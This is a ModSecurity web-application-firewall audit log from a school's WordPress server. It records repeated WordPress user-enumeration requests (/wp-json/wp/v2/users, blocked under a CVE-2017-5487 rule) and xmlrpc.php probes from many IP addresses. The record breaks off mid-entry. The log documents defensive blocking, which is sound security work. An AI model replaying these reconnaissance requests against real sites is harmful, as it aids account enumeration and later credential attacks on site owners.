Intercepted (phase 2) Stopwatch: 1746840711771978 2542 (- - -) Stopwatch2: 1746840711771978 2542; combined=1456, p1=466, p2=947, p3=0, p4=0, p5=42, sr=91, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --999fd026-Z-- --d771d965-A-- [10/May/2025:08:31:56 +0700] aB6sjBLuBiaF9R054QBa3wAAAAQ 103.236.140.4 53676 103.236.140.4 8181 --d771d965-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.196 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d771d965-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d771d965-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840716996085 2058 (- - -) Stopwatch2: 1746840716996085 2058; combined=1050, p1=348, p2=673, p3=0, p4=0, p5=28, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d771d965-Z-- --7c535746-A-- [10/May/2025:08:31:57 +0700] aB6sjRLuBiaF9R054QBa4AAAAAU 103.236.140.4 53678 103.236.140.4 8181 --7c535746-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.199 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7c535746-C-- demo.sayHello --7c535746-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c535746-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840717010466 4810 (- - -) Stopwatch2: 1746840717010466 4810; combined=3865, p1=442, p2=3214, p3=28, p4=31, p5=88, sr=64, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c535746-Z-- --3b3c1e7b-A-- [10/May/2025:08:32:01 +0700] aB6skauC4AqLGUOyzyX71wAAAIU 103.236.140.4 53686 103.236.140.4 8181 --3b3c1e7b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.196 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3b3c1e7b-C-- demo.sayHello --3b3c1e7b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b3c1e7b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840721687851 5556 (- - -) Stopwatch2: 1746840721687851 5556; combined=4105, p1=543, p2=3343, p3=31, p4=34, p5=91, sr=75, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b3c1e7b-Z-- --bc7e7813-A-- [10/May/2025:08:32:39 +0700] aB6stxLuBiaF9R054QBa5gAAAA4 103.236.140.4 53700 103.236.140.4 8181 --bc7e7813-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bc7e7813-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc7e7813-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840759499140 2814 (- - -) Stopwatch2: 1746840759499140 2814; combined=1248, p1=445, p2=772, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc7e7813-Z-- --491f1b27-A-- [10/May/2025:08:32:41 +0700] aB6suRLuBiaF9R054QBa6QAAABQ 103.236.140.4 53706 103.236.140.4 8181 --491f1b27-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.155 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --491f1b27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --491f1b27-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840761177016 1920 (- - -) Stopwatch2: 1746840761177016 1920; combined=1011, p1=329, p2=655, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --491f1b27-Z-- --1a2b4650-A-- [10/May/2025:08:32:45 +0700] aB6svRLuBiaF9R054QBa6gAAABU 103.236.140.4 53708 103.236.140.4 8181 --1a2b4650-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.129 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.129 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1a2b4650-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a2b4650-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840765233103 2845 (- - -) Stopwatch2: 1746840765233103 2845; combined=1242, p1=425, p2=788, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a2b4650-Z-- --7399d438-A-- [10/May/2025:08:32:45 +0700] aB6svRLuBiaF9R054QBa7AAAABc 103.236.140.4 53712 103.236.140.4 8181 --7399d438-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.199 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7399d438-C-- demo.sayHello --7399d438-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7399d438-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840765547491 4524 (- - -) Stopwatch2: 1746840765547491 4524; combined=3572, p1=432, p2=2941, p3=22, p4=24, p5=90, sr=65, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7399d438-Z-- --88d08462-A-- [10/May/2025:08:32:48 +0700] aB6swKuC4AqLGUOyzyX72QAAAIo 103.236.140.4 53716 103.236.140.4 8181 --88d08462-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.155 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --88d08462-C-- demo.sayHello --88d08462-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --88d08462-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840768836201 4846 (- - -) Stopwatch2: 1746840768836201 4846; combined=3825, p1=456, p2=3148, p3=31, p4=36, p5=91, sr=67, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88d08462-Z-- --8925b75d-A-- [10/May/2025:08:32:50 +0700] aB6swhLuBiaF9R054QBa7gAAABg 103.236.140.4 53720 103.236.140.4 8181 --8925b75d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.129 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.129 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8925b75d-C-- demo.sayHello --8925b75d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8925b75d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840770557761 4831 (- - -) Stopwatch2: 1746840770557761 4831; combined=3696, p1=421, p2=3047, p3=25, p4=23, p5=112, sr=72, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8925b75d-Z-- --6e484b57-A-- [10/May/2025:08:32:51 +0700] aB6swxLuBiaF9R054QBa7wAAAAM 103.236.140.4 53722 103.236.140.4 8181 --6e484b57-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 14.241.196.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.241.196.206 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6e484b57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e484b57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840771424151 1942 (- - -) Stopwatch2: 1746840771424151 1942; combined=1010, p1=332, p2=652, p3=0, p4=0, p5=26, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e484b57-Z-- --ad808338-A-- [10/May/2025:08:33:19 +0700] aB6s3xLuBiaF9R054QBa8QAAAAQ 103.236.140.4 53728 103.236.140.4 8181 --ad808338-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.106.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.106.36 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ad808338-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad808338-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840799291569 3284 (- - -) Stopwatch2: 1746840799291569 3284; combined=1430, p1=481, p2=914, p3=0, p4=0, p5=34, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad808338-Z-- --8235d951-A-- [10/May/2025:08:33:31 +0700] aB6s6xLuBiaF9R054QBa8wAAAAI 103.236.140.4 53734 103.236.140.4 8181 --8235d951-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.106.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.106.36 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8235d951-C-- demo.sayHello --8235d951-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8235d951-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840811585817 5618 (- - -) Stopwatch2: 1746840811585817 5618; combined=4075, p1=527, p2=3325, p3=29, p4=30, p5=96, sr=73, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8235d951-Z-- --15671077-A-- [10/May/2025:08:34:16 +0700] aB6tGBLuBiaF9R054QBa-QAAABE 103.236.140.4 53748 103.236.140.4 8181 --15671077-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --15671077-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15671077-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840856200705 2742 (- - -) Stopwatch2: 1746840856200705 2742; combined=1410, p1=478, p2=901, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15671077-Z-- --e55ccd79-A-- [10/May/2025:08:34:21 +0700] aB6tHRLuBiaF9R054QBa-wAAABM 103.236.140.4 53752 103.236.140.4 8181 --e55ccd79-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.168 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e55ccd79-C-- demo.sayHello --e55ccd79-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e55ccd79-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840861154470 5422 (- - -) Stopwatch2: 1746840861154470 5422; combined=4054, p1=528, p2=3304, p3=30, p4=33, p5=94, sr=74, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e55ccd79-Z-- --f505bd01-A-- [10/May/2025:08:34:53 +0700] aB6tPRLuBiaF9R054QBa_gAAAAA 103.236.140.4 53764 103.236.140.4 8181 --f505bd01-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f505bd01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f505bd01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840893468510 3181 (- - -) Stopwatch2: 1746840893468510 3181; combined=1416, p1=484, p2=898, p3=0, p4=0, p5=34, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f505bd01-Z-- --a37dbf7d-A-- [10/May/2025:08:34:59 +0700] aB6tQxLuBiaF9R054QBbAQAAAAQ 103.236.140.4 53772 103.236.140.4 8181 --a37dbf7d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.237 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a37dbf7d-C-- demo.sayHello --a37dbf7d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a37dbf7d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840899198762 5087 (- - -) Stopwatch2: 1746840899198762 5087; combined=4025, p1=471, p2=3343, p3=28, p4=30, p5=89, sr=68, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a37dbf7d-Z-- --9152392e-A-- [10/May/2025:08:35:03 +0700] aB6tR6uC4AqLGUOyzyX72wAAAI0 103.236.140.4 53774 103.236.140.4 8181 --9152392e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.111 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9152392e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9152392e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability 